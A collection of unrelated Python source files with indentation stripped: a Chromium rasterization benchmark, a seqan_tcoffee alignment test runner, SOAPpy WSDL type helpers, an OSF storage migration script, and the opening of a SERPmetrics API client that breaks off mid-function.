class RasterizeAndPaintMeasurement(page_measurement.PageMeasurement):
def __init__(self):
super(RasterizeAndPaintMeasurement, self).__init__('', True)
self._metrics = None
def AddCommandLineOptions(self, parser):
parser.add_option('--report-all-results', dest='report_all_results',
action='store_true',
help='Reports all data collected')
def CustomizeBrowserOptions(self, options):
options.extra_browser_args.append('--enable-gpu-benchmarking')
# Run each raster task 100 times. This allows us to report the time for the
# best run, effectively excluding cache effects and time when the thread is
# de-scheduled.
options.extra_browser_args.append('--slow-down-raster-scale-factor=100')
# Enable impl-side-painting. Current version of benchmark only works for
# this mode.
options.extra_browser_args.append('--enable-impl-side-painting')
options.extra_browser_args.append('--force-compositing-mode')
options.extra_browser_args.append('--enable-threaded-compositing')
def MeasurePage(self, page, tab, results):
self._metrics = smoothness_metrics.SmoothnessMetrics(tab)
# Rasterize only what's visible
tab.ExecuteJavaScript(
'chrome.gpuBenchmarking.setRasterizeOnlyVisibleContent();')
# Wait until the page has loaded and come to a somewhat steady state
# Empirical wait time for workstation. May need to adjust for other devices
time.sleep(5)
tab.browser.StartTracing('webkit,cc')
self._metrics.Start()
tab.ExecuteJavaScript("""
console.time("measureNextFrame");
window.__rafFired = false;
window.webkitRequestAnimationFrame(function() {
chrome.gpuBenchmarking.setNeedsDisplayOnAllLayers();
window.__rafFired = true;
});
""")
# Wait until the frame was drawn
# Empirical wait time for workstation. May need to adjust for other devices
# TODO(ernstm): replace by call-back.
time.sleep(5)
tab.ExecuteJavaScript('console.timeEnd("measureNextFrame")')
tab.browser.StopTracing()
self._metrics.Stop()
stream = StringIO.StringIO()
tab.browser.GetTraceResultAndReset().Serialize(stream)
events = json.loads(stream.getvalue())
if 'traceEvents' in events:
events = events['traceEvents']
collector = StatsCollector(events)
collector.gatherRenderingStats()
rendering_stats = self._metrics.end_values
results.Add('best_rasterize_time', 'seconds',
collector.total_best_rasterize_time / 1000000.0,
data_type='unimportant')
results.Add('best_record_time', 'seconds',
collector.total_best_record_time / 1000000.0,
data_type='unimportant')
results.Add('total_pixels_rasterized', 'pixels',
collector.total_pixels_rasterized,
data_type='unimportant')
results.Add('total_pixels_recorded', 'pixels',
collector.total_pixels_recorded,
data_type='unimportant')
if self.options.report_all_results:
for k, v in rendering_stats.iteritems():
results.Add(k, '', v)
|
|
#!/usr/bin/env python2
"""Execute the tests for the seqan_tcoffee program.
The golden test outputs are generated by the script generate_outputs.sh.
You have to give the root paths to the source and the binaries as arguments to
the program. These are the paths to the directory that contains the 'projects'
directory.
Usage: run_tests.py SOURCE_ROOT_PATH BINARY_ROOT_PATH
"""
import logging
import os.path
import sys
import platform
# Automagically add util/py_lib to PYTHONPATH environment variable.
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..',
'..', '..', 'util', 'py_lib'))
sys.path.insert(0, path)
import seqan.app_tests as app_tests
def main(source_base, binary_base):
"""Main entry point of the script."""
if platform.machine().startswith('mips') or platform.machine().startswith('s390'):
print 'Skipping tests for seqan_tcoffee on mips* and s390*'
print '==================================================='
return 0
print 'Executing test for seqan_tcoffee'
print '================================'
print
ph = app_tests.TestPathHelper(
source_base, binary_base,
'apps/seqan_tcoffee/tests') # tests dir
# ============================================================
# Auto-detect the binary path.
# ============================================================
path_to_program = app_tests.autolocateBinary(
binary_base, 'apps/seqan_tcoffee', 'seqan_tcoffee')
# ============================================================
# Built TestConf list.
# ============================================================
# Build list with TestConf objects, analogously to how the output
# was generated in generate_outputs.sh.
conf_list = []
# ============================================================
# Run on Proteins (Balibase).
# ============================================================
# Run with defaults for all non-mandatory options.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.fasta' % fname)],
to_diff=[(ph.inFile('%s.fasta' % fname),
ph.outFile('%s.fasta' % fname))])
conf_list.append(conf)
# Run with explicit alphabet.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'protein',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.protein.fasta' % fname)],
to_diff=[(ph.inFile('%s.protein.fasta' % fname),
ph.outFile('%s.protein.fasta' % fname))])
conf_list.append(conf)
# Run with different segment match generation options. We run
# with single values and combinations of neighbours
for fname in ['1aab', '1ad2', '2trx']:
for m in ['global', 'local', 'overlap', 'lcs']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.fasta' % (fname, m))],
to_diff=[(ph.inFile('%s.m%s.fasta' % (fname, m)),
ph.outFile('%s.m%s.fasta' % (fname, m)))])
conf_list.append(conf)
m1 = 'global'
m2 = 'local'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
m1 = 'local'
m2 = 'overlap'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
m1 = 'overlap'
m2 = 'lcs'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
m1 = 'global'
m2 = 'lcs'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
# Run with different match files variations.
# TODO
# Run with different scoring options.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-g', '-20',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.g-20.fasta' % fname)],
to_diff=[(ph.inFile('%s.g-20.fasta' % fname),
ph.outFile('%s.g-20.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-e', '-5',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.e-5.fasta' % fname)],
to_diff=[(ph.inFile('%s.e-5.fasta' % fname),
ph.outFile('%s.e-5.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-ms', '10',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.ms10.fasta' % fname)],
to_diff=[(ph.inFile('%s.ms10.fasta' % fname),
ph.outFile('%s.ms10.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-mm', '-8',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.mm-8.fasta' % fname)],
to_diff=[(ph.inFile('%s.mm-8.fasta' % fname),
ph.outFile('%s.mm-8.fasta' % fname))])
conf_list.append(conf)
# Run with matrix file.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-ma', ph.inFile('VTML200I'),
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.maVTML200.fasta' % fname)],
to_diff=[(ph.inFile('%s.maVTML200.fasta' % fname),
ph.outFile('%s.maVTML200.fasta' % fname))])
conf_list.append(conf)
# Run with manual guide tree.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-u', ph.inFile('%s.newick' % fname),
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.u.fasta' % fname)],
to_diff=[(ph.inFile('%s.u.fasta' % fname),
ph.outFile('%s.u.fasta' % fname))])
conf_list.append(conf)
# Run with different guide tree building options.
for fname in ['1aab', '1ad2', '2trx']:
for b in ['nj', 'min', 'max', 'avg', 'wavg']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-b', b,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.b%s.fasta' % (fname, b))],
to_diff=[(ph.inFile('%s.b%s.fasta' % (fname, b)),
ph.outFile('%s.b%s.fasta' % (fname, b)))])
conf_list.append(conf)
# Run alignment evaluation.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-i', ph.inFile('%s.fasta' % fname)],
redir_stdout=ph.outFile('%s.i.fasta' % fname),
to_diff=[(ph.inFile('%s.i.fasta' % fname),
ph.outFile('%s.i.fasta' % fname))])
conf_list.append(conf)
# ============================================================
# Run on DNA (Adenoviruses).
# ============================================================
# Run with defaults for all non-mandatory options.
for i in [2, 3, 4]:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'dna',
'-s', ph.inFile('adeno%d.fa' % i),
'-o', ph.outFile('adeno%d.fasta' % i)],
to_diff=[(ph.inFile('adeno%d.fasta' % i),
ph.outFile('adeno%d.fasta' % i))])
conf_list.append(conf)
# ============================================================
# Run on RNA.
# ============================================================
# Run with defaults for all non-mandatory options.
for i in [2, 3, 4]:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'rna',
'-s', ph.inFile('adeno%d-rna.fa' % i),
'-o', ph.outFile('adeno%d-rna.fasta' % i)],
to_diff=[(ph.inFile('adeno%d-rna.fasta' % i),
ph.outFile('adeno%d-rna.fasta' % i))])
conf_list.append(conf)
# Execute the tests.
failures = 0
for conf in conf_list:
res = app_tests.runTest(conf)
# Output to the user.
print ' '.join(['seqan_tcoffee'] + conf.args),
if res:
print 'OK'
else:
failures += 1
print 'FAILED'
# Cleanup.
ph.deleteTempDir()
print '=============================='
print ' total tests: %d' % len(conf_list)
print ' failed tests: %d' % failures
print 'successful tests: %d' % (len(conf_list) - failures)
print '=============================='
# Compute and return return code.
return failures != 0
if __name__ == '__main__':
sys.exit(app_tests.main(main))
|
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for interacting with SOAPpy type objects."""
__author__ = '[email protected] (Joseph DiLallo)'
def GetArrayItemTypeName(type_name, ns, soappy_service):
"""Returns the name of the SOAP type which the items in an array represent.
Python arrays can represent two distinct kinds of SOAP objects: SOAP encoded
arrays or complex type elements with a maxOccurs field greater than 1. In the
first case, the type_name given represents the SOAP encoded array type and the
type returned will be the content's type. In the second case, or any case
where the type_name given is not a SOAP encoded array, the type_name given is
the one that will be returned.
Args:
type_name: string The name of the WSDL-defined type of the array.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
string The type name of the array's contents.
"""
try:
array_type = GetTypeFromSoappyService(type_name, ns, soappy_service)
attr_contents = array_type.content.derivation.attr_content
if attr_contents:
raw_type_name = attr_contents[0].attributes[
'http://schemas.xmlsoap.org/wsdl/']['arrayType']
return raw_type_name[raw_type_name.find(':') + 1:-2]
else:
return type_name
except KeyError:
return type_name
except AttributeError:
return type_name
def IsASuperType(soappy_service, sub_type, ns, super_type):
"""Determines if one type is a supertype of another type.
Any case where the sub_type cannot be traced through to super_type is
considered to be false.
Args:
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
sub_type: A string representing a type that may be extending super_type.
ns: A string representing the namespace sub_type belongs to.
super_type: A string representing a type that may be extended by sub_type.
Returns:
bool Whether super_type is really a supertype of sub_type.
"""
if sub_type == super_type: return True
try:
if IsASubType(sub_type, ns, soappy_service):
complex_type = GetTypeFromSoappyService(sub_type, ns, soappy_service)
return IsASuperType(
soappy_service,
complex_type.content.derivation.attributes['base'].getName(), ns,
super_type)
else:
return False
except KeyError:
# The given sub_type does not exist in the WSDL definitions.
return False
def IsASubType(type_name, ns, soappy_service):
"""Determines if a WSDL-defined type is extending another WSDL-defined type.
Args:
type_name: string The name of the WSDL-defined type.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
boolean Whether the given type is extending another type.
"""
return hasattr(GetTypeFromSoappyService(
type_name, ns, soappy_service).content, 'derivation')
def IsAnArrayType(type_name, ns, soappy_service):
"""Determines if a complex type represents a SOAP-encoded array.
Args:
type_name: string The name of the WSDL-defined type.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
boolean Whether the given type represents an array.
"""
if type_name == 'Array':
return True
try:
wsdl_type_def = GetTypeFromSoappyService(type_name, ns, soappy_service)
if hasattr(wsdl_type_def.content, 'derivation'):
# This is an extension of another type.
return IsAnArrayType(
wsdl_type_def.content.derivation.attributes['base'].getName(),
wsdl_type_def.content.derivation.attributes[
'base'].getTargetNamespace(), soappy_service)
else:
return False
except KeyError:
return False
def GetTypeFromSoappyService(type_name, ns, soappy_service):
"""Digs in a SOAPpy service proxy and returns the object representing a type.
Args:
type_name: string The name of the WSDL-defined type to search for.
ns: string The namespace the given WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the information stored in the WSDL.
Returns:
mixed The object created by SOAPpy representing the given type. May be
either a SOAPpy.wstools.XMLSchema.SimpleType or
SOAPpy.wstools.XMLSchema.ComplexType object.
"""
return soappy_service.wsdl.types[ns].types[type_name]
def GenKeyOrderAttrs(soappy_service, ns, type_name):
"""Generates the order and attributes of keys in a complex type.
Args:
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the information stored in the WSDL.
ns: string The namespace the given WSDL-defined type belongs to.
type_name: string The name of the WSDL-defined type to search for.
Returns:
list A list of dictionaries containing the attributes of keys within a
complex type, in order.
"""
complex_type = soappy_service.wsdl.types[ns].types[type_name]
if IsASubType(type_name, ns, soappy_service):
# This is an extension of another type.
key_order = GenKeyOrderAttrs(
soappy_service,
complex_type.content.derivation.attributes['base'].getTargetNamespace(),
complex_type.content.derivation.attributes['base'].getName())
if hasattr(complex_type.content.derivation.content, 'content'):
key_order.extend([element.attributes for element in
complex_type.content.derivation.content.content])
return key_order
else:
# This is a base type.
return [element.attributes for element in complex_type.content.content]
def PruneKeyOrder(key_order, soappy_struct_object):
"""Creates a new key order of only keys that the complex type used.
Args:
key_order: list A list of the keys this complex type contains, in order.
These keys are not namespaced, whereas the ones in the given
object may be.
soappy_struct_object: SOAPpy.Types.structType The complex type packed into a
SOAPpy object. Already has within it all of the keys
it is going to use.
Returns:
list A new key order containing only the keys used in the given object.
These keys may be namespaced; they appear as they are in the given object.
"""
new_key_order = []
key_to_namespaced_key = {}
for namespaced_key in soappy_struct_object._data.keys():
if ':' in namespaced_key:
key_to_namespaced_key[namespaced_key[
namespaced_key.find(':') + 1:]] = namespaced_key
else:
key_to_namespaced_key[namespaced_key] = namespaced_key
for namespaced_attribute in dir(soappy_struct_object):
if ':' in namespaced_attribute:
key_to_namespaced_key[namespaced_attribute[
namespaced_attribute.find(':') + 1:]] = namespaced_attribute
else:
key_to_namespaced_key[namespaced_attribute] = namespaced_attribute
for key in key_order:
if key in key_to_namespaced_key:
new_key_order.append(key_to_namespaced_key[key])
return new_key_order
def GetComplexFieldTypeByFieldName(key, type_name, ns, soappy_service):
"""Returns the type of a field within a complex type by its key name.
Args:
key: string The name of the field within the given complex type whose type
is being looked up.
type_name: string The name of the encapsulating complex type.
ns: string The namespace the encapsulating complex type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object containing the
descriptions of these types.
Returns:
TypeDescriptionComponent The type of object stored in the field with the
given name.
Raises:
TypeError: if the given key is not within the given complex type.
"""
for param in GenKeyOrderAttrs(soappy_service, ns, type_name):
if param['name'] == key:
return param['type']
raise TypeError('There is no field with the name %s in complex type %s.'
% (key, type_name))
def GetComplexFieldNamespaceByFieldName(field, type_name, ns, soappy_service):
"""Returns the namespace of the type which defines a field in a hierarchy.
Args:
field: string The name of the field within the given complex type whose
namespace is being looked up.
type_name: string The name of the encapsulating complex type.
ns: string The namespace the encapsulating complex type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object containing the
descriptions of these types.
Returns:
string The URL of the namespace this field was defined within.
Raises:
TypeError: if the given field is not within the given complex type.
"""
type_obj = soappy_service.wsdl.types[ns].types[type_name]
if IsASubType(type_name, ns, soappy_service):
if hasattr(type_obj.content.derivation.content, 'content'):
for element in type_obj.content.derivation.content.content:
if element.attributes['name'] == field: return ns
try:
return GetComplexFieldNamespaceByFieldName(
field,
type_obj.content.derivation.attributes['base'].getName(),
type_obj.content.derivation.attributes['base'].getTargetNamespace(),
soappy_service)
except TypeError:
raise TypeError('There is no field with the name %s in complex type %s.'
% (field, type_name))
else:
for element in type_obj.content.content:
if element.attributes['name'] == field: return ns
raise TypeError('There is no field with the name %s in complex type %s.'
% (field, type_name))
def GetExplicitType(obj, type_name, ns, soappy_service):
"""Returns the WSDL-defined type set within the given object, if one exists.
Args:
obj: dict The python representation of an object of the given type.
type_name: string The name of the type the given object represents.
ns: string The namespace the given type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the WSDL definitions.
Returns:
tuple(string, string) The name of the type explicitly set within the given
object, followed by the key used to specify this type. If no type is set
within the given object, returns the tuple (None, None).
"""
if 'xsi_type' in obj:
return (obj['xsi_type'], 'xsi_type')
elif 'type' in obj and not _HasNativeType(type_name, ns, soappy_service):
return (obj['type'], 'type')
else:
for item in obj:
if item.find('.Type') > -1 or item.find('_Type') > -1:
return (obj[item], item)
return (None, None)
def _HasNativeType(type_name, ns, soappy_service):
"""Checks a given WSDL-defined type for a field named 'type'.
Args:
type_name: string The name of the type to search.
ns: string The namespace the given type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the WSDL definitions.
Returns:
bool Whether or not the given type has a field named 'type'.
"""
params = GenKeyOrderAttrs(soappy_service, ns, type_name)
for param in params:
if param['name'] == 'type': return True
return False
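# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative only): the WSDL URL, namespace and type
# names below are placeholders, not definitions from any real service.
#
#   from SOAPpy import WSDL
#   soappy_service = WSDL.Proxy('https://example.com/service?wsdl')
#   ns = 'https://example.com/service/v201101'
#
#   if IsAnArrayType('Criteria', ns, soappy_service):
#       item_type = GetArrayItemTypeName('Criteria', ns, soappy_service)
#   key_order = GenKeyOrderAttrs(soappy_service, ns, 'Campaign')
# ---------------------------------------------------------------------------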
|
|
from __future__ import division
from __future__ import unicode_literals
import math
import logging
import progressbar
from pymongo.errors import DuplicateKeyError
from modularodm import Q
from modularodm.storage.base import KeyExistsException
from framework.mongo import database
from framework.analytics import clean_page
from framework.transactions.context import TokuTransaction
from scripts import utils as scripts_utils
from website.app import init_app
from website.project.model import NodeLog
from website.addons.osfstorage import model
logger = logging.getLogger(__name__)
LOG_ACTIONS = set([
'osf_storage_file_added',
'osf_storage_file_updated',
'osf_storage_file_removed',
'osf_storage_file_restored',
'file_added',
'file_updated',
'file_removed',
'file_restored',
])
def migrate_download_counts(node, children, dry=True):
collection = database['pagecounters']
updates = []
for old_path, new in children.items():
if dry:
# Note in dry mode new is None
new_id = ':'.join(['download', node._id, 'new_id'])
old_id = ':'.join(['download', node._id, old_path])
else:
new_id = ':'.join(['download', node._id, new._id])
old_id = ':'.join(['download', node._id, old_path])
result = collection.find_one({'_id': clean_page(old_id)})
if not result:
continue
logger.info('Copying download counts of {!r} to {!r}'.format(old_path, new))
if not dry:
result['_id'] = new_id
updates.append(result)
# try:
# # database.pagecounters.insert(result)
# except DuplicateKeyError:
# logger.warn('Already migrated {!r}'.format(old_path))
# continue
else:
continue
for idx in range(len(new.versions)):
result = collection.find_one({'_id': clean_page('{}:{}'.format(old_id, idx + 1))})
if not result:
continue
logger.info('Copying download count of version {} of {!r} to version {} of {!r}'.format(idx + 1, old_path, idx, new))
if not dry:
result['_id'] = '{}:{}'.format(new_id, idx)
updates.append(result)
# database.pagecounters.insert(result)
if not dry:
try:
database.pagecounters.insert(updates, continue_on_error=True)
except DuplicateKeyError:
pass
def migrate_node_settings(node_settings, dry=True):
logger.info('Running `on add` for node settings of {}'.format(node_settings.owner._id))
if not dry:
node_settings.on_add()
def migrate_file(node, old, parent, dry=True):
assert isinstance(old, model.OsfStorageFileRecord)
if not dry:
try:
new = parent.append_file(old.name)
logger.debug('Created new child {}'.format(old.name))
except KeyExistsException:
logger.warning('{!r} has already been migrated'.format(old))
return parent.find_child_by_name(old.name)
new.versions = old.versions
new.is_deleted = old.is_deleted
new.save()
else:
new = None
return new
def migrate_logs(node, children, dry=True):
for log in NodeLog.find(Q('params.node', 'eq', node._id)):
if log.action not in LOG_ACTIONS:
continue
if log.params.get('_path') is not None and log.params.get('_urls'):
logger.warning('Log for file {} has already been migrated'.format(log.params['path']))
continue
if dry:
logger.debug('{!r} {} -> {}'.format(log, log.params['path'], 'New path'))
continue
try:
new = children[log.params['path']]
except KeyError:
if not log.params['path'].startswith('/'):
logger.warning('Failed to migrate log with path {}'.format(log.params['path']))
continue
mpath = new.materialized_path()
url = '/{}/files/osfstorage/{}/'.format(node._id, new._id)
logger.debug('{!r} {} -> {}'.format(log, log.params['path'], mpath))
log.params['_path'] = mpath
log.params['_urls'] = {
'view': url,
'download': url + '?action=download'
}
log.save()
NodeLog._cache.clear()
def migrate_guids(node, children, dry=True):
for guid in model.OsfStorageGuidFile.find(Q('node', 'eq', node)):
if guid._path is not None:
logger.warn('File guid {} has already been migrated'.format(guid._id))
continue
logger.info('Migrating file guid {}'.format(guid._id))
if not dry:
try:
guid._path = children[guid.path].path
except KeyError:
if not guid.path.startswith('/'):
raise
logger.warning('Already migrated {!r}'.format(guid))
continue
guid.save()
model.OsfStorageGuidFile._cache.clear()
def migrate_children(node_settings, dry=True):
if not node_settings.file_tree:
return logger.warning('Skipping node {}; file_tree is None'.format(node_settings.owner._id))
logger.info('Migrating children of node {}'.format(node_settings.owner._id))
children = {}
for x in node_settings.file_tree.children:
n = migrate_file(node_settings.owner, x, node_settings.root_node, dry=dry)
if n: # not migrated yet
children[x.path] = n
migrate_logs(node_settings.owner, children, dry=dry)
migrate_guids(node_settings.owner, children, dry=dry)
migrate_download_counts(node_settings.owner, children, dry=dry)
del children
def main(nworkers, worker_id, dry=True, catchup=True):
if not dry:
scripts_utils.add_file_logger(logger, __file__)
logger.info('Not running in dry mode, changes WILL be made')
else:
logger.info('Running in dry mode, changes will NOT be made')
if catchup:
logger.info('Running in catchup mode, looping over ALL OsfStorageNodeSettings objects')
to_migrate = model.OsfStorageNodeSettings.find()
else:
to_migrate = model.OsfStorageNodeSettings.find(Q('root_node', 'eq', None))
if to_migrate.count() == 0:
logger.info('No nodes to migrate; exiting...')
return
count = 0
failed = 0
logger.info('Found {} nodes to migrate'.format(to_migrate.count()))
progress_bar = progressbar.ProgressBar(maxval=math.ceil(to_migrate.count() / nworkers)).start()
for node_settings in to_migrate:
if hash(node_settings._id) % nworkers != worker_id:
continue
try:
with TokuTransaction():
migrate_node_settings(node_settings, dry=dry)
migrate_children(node_settings, dry=dry)
count += 1
progress_bar.update(count)
except Exception as error:
logger.error('Could not migrate file tree from {}'.format(node_settings.owner._id))
logger.exception(error)
failed += 1
progress_bar.finish()
if failed > 0:
logger.error('Failed to migrate {} nodes'.format(failed))
# Migrate file guids
# db.osfstorageguidfile.update({
# '_path': {'$ne': null}
# }, {
# $rename:{'path': 'premigration_path'}
# }, {multi: true})
# db.osfstorageguidfile.update({
# '_path': {'$ne': null}
# }, {
# $rename:{'_path': 'path'}
# }, {multi: true})
# Migrate logs
# db.nodelog.update({
# 'params._path': {'$ne': null}
# }, {
# $rename:{'params.path': 'params.premigration_path'}
# }, {multi: true})
# db.nodelog.update({
# 'params._path': {'$ne': null}
# }, {
# $rename:{'params._path': 'params.path'}
# }, {multi: true})
# db.nodelog.update({
# 'params._urls': {'$ne': null}
# }, {
# $rename:{'params.urls': 'params.premigration_urls'}
# }, {multi: true})
# db.nodelog.update({
# 'params._urls': {'$ne': null}
# }, {
# $rename:{'params._urls': 'params.urls'}
# }, {multi: true})
if __name__ == '__main__':
import sys
nworkers = int(sys.argv[1])
worker_id = int(sys.argv[2])
dry = 'dry' in sys.argv
catchup = 'catchup' in sys.argv
if 'debug' in sys.argv:
logger.setLevel(logging.DEBUG)
elif 'info' in sys.argv:
logger.setLevel(logging.INFO)
elif 'error' in sys.argv:
logger.setLevel(logging.ERROR)
init_app(set_backends=True, routes=False)
main(nworkers, worker_id, dry=dry, catchup=catchup)
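# Hedged invocation examples (the script name is a placeholder; the argument
# handling matches the __main__ block above):
#
#   python migrate_osfstorage.py 4 0 dry debug    # worker 0 of 4, no writes, DEBUG logging
#   python migrate_osfstorage.py 4 0 catchup info # all node settings, changes are made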
|
|
import time, datetime
import hmac, hashlib
import urllib, urllib2, socket
import json
"""SERPmetrics Python-SDK"""
class SMapi(object):
VERSION = 'v0.0.2'
api_url = 'http://api.serpmetrics.com'
user_agent = 'SERPmetrics Python Library'
retries = 3
_http_status = None
_credentials = {'key':None, 'secret':None}
"""
Sets up a new SM instance
@param dict credentials
@return void
"""
def __init__(self, credentials={}):
super(SMapi, self).__init__()
self._credentials = credentials
"""
Adds a new keyword to the queue. engines should be passed as a list
of {engine}_{locale} strings.
Also takes a list of keyword strings
Ex. ["google_en-us", "yahoo_en-us", "bing_en-us"]
@param string or list keyword
@param list engines
@param string location
@param string device
@return mixed
"""
def add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/keywords/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Removes a keyword from the queue.
Note: this REMOVES a keyword entirely, including ALL engines assigned. To update
a keyword's engine list, simply call add() with the new engine list
Also takes a list of keyword_id strings.
@param string or list keyword_id
@return mixed
"""
def remove(self, keyword_id):
options = {'path':'/keywords/delete', 'params':{'keyword_id':keyword_id}}
return self.rest(options)
"""
Adds a new keyword to the priority queue, usage as per add()
"""
def priority_add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/priority/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Gets status for a given priority_id
@param string priority_id
@return mixed
"""
def priority_status(self, priority_id):
options = {'path':'/priority/status', 'params':{'priority_id':priority_id}}
return self.rest(options)
"""
Adds a new keyword to the delayed queue, usage as per add()
"""
def delayed_add(self, keyword, engines, location=None, device="desktop"):
if not isinstance(engines, list) and len(engines):
engines = [engines]
options = {'path':'/delayed/add', 'params':{'keyword':keyword, 'engines':engines, 'location':location, 'device':device}}
return self.rest(options)
"""
Gets status for a given delayed_id
@param string delayed_id
@return mixed
"""
def delayed_status(self, delayed_id):
options = {'path':'/delayed/status', 'params':{'delayed_id':delayed_id}}
return self.rest(options)
"""
Gets the last 'limit' SERP check timestamps/ids for a keyword/engine combination. engine
should be in the format {engine}_{locale} (for example google_en-us).
@param string keyword_id
@param string engine
@param integer limit (optional)
@return dict
"""
def check(self, keyword_id, engine, limit=10):
options = {'path':'/keywords/check', 'params':{'keyword_id':keyword_id, 'engine':engine, 'limit':limit}, 'method':'GET'}
return self.rest(options)
"""
Get SERP data for a given check_id, optionally restricted to the specified domain
@param string check_id
@param string domain
@return mixed
"""
def serp(self, check_id, domain=None):
options = {'path':'/keywords/serp', 'params':{'check_id':check_id, 'domain':domain}}
return self.rest(options)
"""
Get current credit balance
@return mixed
"""
def credit(self):
options = {'path':'/users/credit'}
return self.rest(options)
"""
Get trended flux data for a given engine_code
@param string engine_code
@param string type
@return mixed
"""
def flux(self, engine_code, _type='daily'):
options = {'path':'/flux/trend', 'params':{'engine_code':engine_code, 'type':_type}}
return self.rest(options)
"""
Generates authentication signature
@param dict credentials
@return dict
"""
def _generate_signature(self, credentials=None):
now = datetime.datetime.now()
ts = str(time.mktime(now.timetuple())).split('.')[0]
if not credentials or not len(credentials):
credentials = self._credentials
h = hmac.new(credentials['secret'], ts, hashlib.sha256).digest()
signature = h.encode("base64")
#signature = ts+signature
return {'ts':int(ts), 'signature':signature}
"""
Generates a REST request to the API with retries and exponential backoff
@param dict options
@param dict credentials
@return mixed
"""
def rest(self, options, credentials={}):
defaults = {'method':'POST',
'url':self.api_url,
'path':'/', }
# Concatenate options with defaults
for key in defaults.keys():
if not key in options.keys():
options[key] = defaults[key]
if 'params' in options.keys() and options['params']:
params = json.dumps(options['params'])
else:
params = {}
if not credentials:
credentials = self._credentials
auth = self._generate_signature(credentials)
auth['signature'] = auth['signature'].strip('\n')
_params = params if params else None
options['query'] = {'key':credentials['key'],
'auth':auth['signature'],
